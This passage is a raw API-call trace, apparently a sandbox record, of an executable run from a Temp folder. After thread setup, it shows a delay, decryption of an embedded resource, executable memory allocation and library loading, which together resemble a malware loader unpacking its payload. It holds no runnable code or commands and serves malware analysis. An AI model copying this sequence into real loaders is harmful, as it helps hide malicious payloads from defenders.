(lpString="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaAaaAaaa") returned 0xc006 [0104.278] GetAtomNameA (in: nAtom=0xc006, lpBuffer=0x28fc7c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-_pthread_tls_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaAaaAaa") returned 0x41 [0104.278] ReleaseMutex (hMutex=0x34) returned 1 [0104.278] CloseHandle (hObject=0x34) returned 1 [0104.278] ReleaseSemaphore (in: hSemaphore=0x30, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0104.278] CloseHandle (hObject=0x30) returned 1 [0104.278] strlen (_Str="mtx_pthr_locked_shmem") returned 0x15 [0104.278] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mtx_pthr_locked_shmem") returned 0x30 [0104.279] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0104.279] FindAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.279] AddAtomA (lpString="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAaAaaa") returned 0xc007 [0104.279] GetAtomNameA (in: nAtom=0xc007, lpBuffer=0x28fc9c, nSize=69 | out: lpBuffer="gcc-shmem-tdm2-mtx_pthr_locked_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAaAaa") returned 0x44 [0104.279] ReleaseMutex (hMutex=0x30) returned 1 [0104.279] CloseHandle (hObject=0x30) returned 1 [0104.279] strlen (_Str="mutex_global_static_shmem") returned 0x19 [0104.279] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mutex_global_static_shmem") returned 0x30 [0104.279] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0104.279] FindAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.279] AddAtomA (lpString="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAAaaaa") returned 0xc008 [0104.279] GetAtomNameA (in: nAtom=0xc008, lpBuffer=0x28fc2c, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-mutex_global_static_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAAaaa") returned 0x48 [0104.279] ReleaseMutex (hMutex=0x30) returned 1 [0104.279] CloseHandle (hObject=0x30) returned 1 [0104.279] strlen (_Str="mxattr_recursive_shmem") returned 0x16 [0104.279] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-mxattr_recursive_shmem") returned 0x30 [0104.279] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0104.279] FindAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.279] AddAtomA (lpString="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAAAAaa") returned 0xc009 [0104.279] GetAtomNameA (in: nAtom=0xc009, lpBuffer=0x28fc2c, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-mxattr_recursive_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaaAAAAa") returned 0x45 [0104.284] ReleaseMutex (hMutex=0x30) returned 1 [0104.284] CloseHandle (hObject=0x30) returned 1 [0104.284] calloc (_Count=0x1, _Size=0x1c) returned 0x210a0 [0104.284] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x30 [0104.284] WaitForSingleObject (hHandle=0x30, dwMilliseconds=0xffffffff) returned 0x0 [0104.284] GetCurrentThreadId () returned 0x5d0 [0104.284] strlen (_Str="pthr_root_shmem") returned 0xf [0104.284] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x34 [0104.284] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0104.284] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.284] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaAAaaAaa") returned 0xc00a [0104.284] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x28fcac, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaAaaaaAaaaaAAaaAa") returned 0x3e [0104.284] ReleaseMutex (hMutex=0x34) returned 1 [0104.284] CloseHandle (hObject=0x34) returned 1 [0104.284] calloc (_Count=0x1, _Size=0xc0) returned 0x210d8 [0104.284] strlen (_Str="idListCnt_shmem") returned 0xf [0104.284] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x34 [0104.284] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0104.284] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.284] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaAaaaaAaaaAAaAaaaa") returned 0xc00b [0104.285] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x28fc7c, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaAaaaaAaaaAAaAaaa") returned 0x3e [0104.285] ReleaseMutex (hMutex=0x34) returned 1 [0104.285] CloseHandle (hObject=0x34) returned 1 [0104.285] strlen (_Str="idListMax_shmem") returned 0xf [0104.285] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x34 [0104.285] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0104.285] FindAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.285] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaAaaaaAaaaAAaAAaaa") returned 0xc00c [0104.285] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x28fc7c, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaAaaaaAaaaAAaAAaa") returned 0x3e [0104.285] ReleaseMutex (hMutex=0x34) returned 1 [0104.285] CloseHandle (hObject=0x34) returned 1 [0104.285] strlen (_Str="idList_shmem") returned 0xc [0104.285] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x34 [0104.285] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0104.285] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.285] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaaAaaAaa") returned 0xc00d [0104.285] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x28fc7c, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaaAaaAa") returned 0x3b [0104.285] ReleaseMutex (hMutex=0x34) returned 1 [0104.285] CloseHandle (hObject=0x34) returned 1 [0104.285] strlen (_Str="idListNextId_shmem") returned 0x12 [0104.285] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x34 [0104.285] WaitForSingleObject (hHandle=0x34, dwMilliseconds=0xffffffff) returned 0x0 [0104.285] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.286] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaaAaAAaa") returned 0xc00e [0104.286] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x28fc6c, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaaAaAAa") returned 0x41 [0104.286] ReleaseMutex (hMutex=0x34) returned 1 [0104.286] CloseHandle (hObject=0x34) returned 1 [0104.286] GetCurrentThreadId () returned 0x5d0 [0104.286] ReleaseSemaphore (in: hSemaphore=0x30, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0104.286] GetCurrentThreadId () returned 0x5d0 [0104.286] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34 [0104.286] GetCurrentProcess () returned 0xffffffff [0104.286] GetCurrentThread () returned 0xfffffffe [0104.286] GetCurrentProcess () returned 0xffffffff [0104.286] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x210ec, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x210ec*=0x38) returned 1 [0104.286] GetThreadPriority (hThread=0x38) returned 0 [0104.286] strlen (_Str="fc_key") returned 0x6 [0104.286] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x3c [0104.286] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0104.286] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.286] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaAaaaaAaaAaaAAaAaa") returned 0xc00f [0104.286] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x28fcfc, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaAaaaaAaaAaaAAaAaa") returned 0x36 [0104.286] ReleaseMutex (hMutex=0x3c) returned 1 [0104.286] CloseHandle (hObject=0x3c) returned 1 [0104.286] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0104.286] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x3c [0104.287] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0104.287] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.287] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaaAAAAaa") returned 0xc010 [0104.287] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaaAAAAa") returned 0x46 [0104.287] ReleaseMutex (hMutex=0x3c) returned 1 [0104.287] CloseHandle (hObject=0x3c) returned 1 [0104.287] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0104.287] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x3c [0104.287] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0104.287] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.287] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaAaaaAaa") returned 0xc011 [0104.287] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x28fc5c, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaAaaaaAaaAaAaaaAa") returned 0x48 [0104.287] ReleaseMutex (hMutex=0x3c) returned 1 [0104.287] CloseHandle (hObject=0x3c) returned 1 [0104.287] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0104.287] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x3c [0104.287] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0104.287] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.287] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaAaaaaAaaAaAaaAAaa") returned 0xc012 [0104.287] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x28fc3c, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaAaaaaAaaAaAaaAAa") returned 0x47 [0104.287] ReleaseMutex (hMutex=0x3c) returned 1 [0104.288] CloseHandle (hObject=0x3c) returned 1 [0104.288] calloc (_Count=0x1, _Size=0x20) returned 0x212b0 [0104.288] calloc (_Count=0x1, _Size=0x1c) returned 0x212d8 [0104.288] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x3c [0104.288] calloc (_Count=0x1, _Size=0x1c) returned 0x21300 [0104.288] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x40 [0104.288] calloc (_Count=0x1, _Size=0x6c) returned 0x21328 [0104.288] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x44 [0104.288] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x48 [0104.288] strlen (_Str="rwl_global_shmem") returned 0x10 [0104.288] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x4c [0104.288] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0104.288] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.288] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaAaaaaAaaAAAaAaaaa") returned 0xc013 [0104.288] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x28fc5c, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaAaaaaAaaAAAaAaaa") returned 0x3f [0104.288] ReleaseMutex (hMutex=0x4c) returned 1 [0104.288] CloseHandle (hObject=0x4c) returned 1 [0104.288] WaitForSingleObject (hHandle=0x3c, dwMilliseconds=0xffffffff) returned 0x0 [0104.288] GetCurrentThreadId () returned 0x5d0 [0104.288] WaitForSingleObject (hHandle=0x40, dwMilliseconds=0xffffffff) returned 0x0 [0104.288] GetCurrentThreadId () returned 0x5d0 [0104.288] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0104.288] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x4c [0104.288] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0104.288] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.289] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaAaaaaAaaAAAaAAAaa") returned 0xc014 [0104.289] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x28fcbc, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaAaaaaAaaAAAaAAAa") returned 0x45 [0104.289] ReleaseMutex (hMutex=0x4c) returned 1 [0104.289] CloseHandle (hObject=0x4c) returned 1 [0104.289] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0104.289] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x4c [0104.289] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0104.289] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.289] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaAaaaaAaaAAAAaaAaa") returned 0xc015 [0104.289] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x28fcbc, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaAaaaaAaaAAAAaaAa") returned 0x45 [0104.289] ReleaseMutex (hMutex=0x4c) returned 1 [0104.289] CloseHandle (hObject=0x4c) returned 1 [0104.289] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0104.289] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x4c [0104.289] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0104.289] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0104.289] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaAaAAaaAAAaaAAaaaa") returned 0xc016 [0104.290] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x28fcbc, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaAaAAaaAAAaaAAaaa") returned 0x46 [0104.290] ReleaseMutex (hMutex=0x4c) returned 1 [0104.290] CloseHandle (hObject=0x4c) returned 1 [0104.290] ReleaseSemaphore (in: hSemaphore=0x40, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0104.290] ReleaseSemaphore (in: hSemaphore=0x3c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0104.290] ReleaseSemaphore (in: hSemaphore=0x2c, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0104.290] CloseHandle (hObject=0x2c) returned 1 [0104.290] GetLastError () returned 0x0 [0104.290] SetLastError (dwErrCode=0x0) [0104.290] GetLastError () returned 0x0 [0104.290] SetLastError (dwErrCode=0x0) [0104.290] Sleep (dwMilliseconds=0x3a98) [0114.296] FindResourceA (hModule=0x0, lpName=0x65, lpType="FILMS") returned 0x423190 [0114.299] LoadResource (hModule=0x0, hResInfo=0x423190) returned 0x42322c [0114.299] SizeofResource (hModule=0x0, hResInfo=0x423190) returned 0x3e400 [0114.300] LockResource (hResData=0x42322c) returned 0x42322c [0114.308] strlen (_Str="G1s,Ny%%ZjbEFWUaS5hW") returned 0x14 [0114.308] strlen (_Str="G1s,Ny%%ZjbEFWUaS5hW") returned 0x14 [0114.308] VirtualAlloc (lpAddress=0x0, dwSize=0xe4f, flAllocationType=0x1000, flProtect=0x40) returned 0x30000 [0114.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0115.340] GetProcAddress (hModule=0x76490000, lpProcName="CryptAcquireContextA") returned 0x764991dd [0115.340] GetProcAddress (hModule=0x76490000, lpProcName="CryptImportKey") returned 0x7649c532 [0115.340] GetProcAddress (hModule=0x76490000, lpProcName="CryptEncrypt") returned 0x764b779b [0115.341] CryptAcquireContextA (in: phProv=0x28fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x28fde8*=0x5439b0) returned 1 [0115.736] CryptImportKey (in: hProv=0x5439b0, pbData=0x28fc14, dwDataLen=0x134, hPubKey=0x0, dwFlags=0x0, phKey=0x28fc00 | out: phKey=0x28fc00*=0x547550) returned 1 [0116.060] CryptImportKey (in: hProv=0x5439b0, pbData=0x28fd60, dwDataLen=0x4c, hPubKey=0x547550, dwFlags=0x0, phKey=0x28fbfc | out: phKey=0x28fbfc*=0x552bf0) returned 1 [0116.062] CryptEncrypt (in: hKey=0x552bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x630048*, pdwDataLen=0x28fe74*=0x3e400, dwBufLen=0x3e400 | out: pbData=0x630048*, pdwDataLen=0x28fe74*=0x3e400) returned 1 [0116.063] VirtualAlloc (lpAddress=0x0, dwSize=0x2b4, flAllocationType=0x1000, flProtect=0x40) returned 0x3d0000 [0116.064] GetLastError () returned 0x3f0 [0116.064] SetLastError (dwErrCode=0x3f0) [0116.064] GetLastError () returned 0x3f0 [0116.064] SetLastError (dwErrCode=0x3f0) [0116.078] _findfirst (param_1="KLVBE.bin", param_2=0x28fce4) returned 0xffffffff [0116.078] GetLastError () returned 0x2 [0116.078] SetLastError (dwErrCode=0x2) [0116.078] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x40) returned 0x4d0000 [0116.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x76b00000 [0118.668] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77e20000 [0118.672] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x75c60000 [0118.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76490000 [0118.675] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75cf0000 [0119.376] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.376] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.376] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.376] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.376] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.376] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.376] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.377] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.377] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.378] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.378] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.379] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.379] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.380] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe\" " [0119.380] GetModuleHandleW 